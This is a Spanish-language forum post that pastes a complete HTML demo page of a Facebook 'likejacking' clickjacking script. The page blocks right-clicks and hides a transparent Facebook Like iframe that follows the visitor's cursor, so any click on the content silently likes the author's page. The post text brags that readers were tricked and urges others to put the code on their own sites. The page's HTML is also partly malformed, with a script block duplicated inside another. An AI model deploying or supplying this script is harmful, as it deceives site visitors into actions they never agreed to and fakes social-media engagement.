bueno no se si servira de algo esto:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <script type='text/javascript'> /*Mensaje que puedes personalizar*/ var mensajeerror = "Boton derecho deshabilitado ¡Gracias por visitarnos!"; if(document.layers) window.captureEvents(Event.MOUSEDOWN); function bloquear(e){
if (navigator.appName == 'Netscape' && ( e.which == 2 || e.which == 3)) { alert(mensajeerror);return false; }
if (navigator.appName == 'Microsoft Internet Explorer' && (event.button == 2 || event.button == 3)) {
alert(mensajeerror);return false; }} window.onmousedown=bloquear; document.onmousedown=bloquear;
</script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- ClickJack Script -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
<script type="text/javascript">
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
<script type='text/javascript'> /*Mensaje que puedes personalizar*/ var mensajeerror = "Boton derecho deshabilitado ¡Gracias por visitarnos!"; if(document.layers) window.captureEvents(Event.MOUSEDOWN); function bloquear(e){
if (navigator.appName == 'Netscape' && ( e.which == 2 || e.which == 3)) { alert(mensajeerror);return false; }
if (navigator.appName == 'Microsoft Internet Explorer' && (event.button == 2 || event.button == 3)) {
alert(mensajeerror);return false; }} window.onmousedown=bloquear; document.onmousedown=bloquear;
</script> <p>Hola compañeros del foro esta pagina es muy sencilla solo textos.. es solo para mostrarles como funciona el Plugin de invisibles
"Me gusta
".
</p> <p>La idea es de agregar este código en sus pagina, para ganar automáticamente un me gusta en sus Paginas de Facebook.
</p> <p>Por ejemplo denle click en cualquier parte del
<strong>contenido
</strong> y
<strong>automáticamente
</strong> le estaran dando me gusta a mi Pagina de facebook, genial no?
</p> <p><strong>Funciona con cualquier tipo de pagina, WordPress, paginas normales como esta, blogs etc etc.
</strong></p> <p>Imagenense cuantos me gusta podrán conseguir con este estupendo código?
</p> <p>Ahora rebisen mi pagina de Facebook y verán como ustedes sin darse cuenta y automáticamente le dieron me gusta.
</p> <p><a href="http://www.facebook.com/pages/I-Love-Music/182164241840858" target="_blank">Pagina de Face
<---
</a></p> <p>Bueno eso seria todo, que tengan un excelente día.
</p> <p>Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido...
</p> <p>Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido...
</p> <p>Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido...
</p> <p>Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido... Contenido...
</p> <div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/pages/I-Love-Music/182164241840858&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}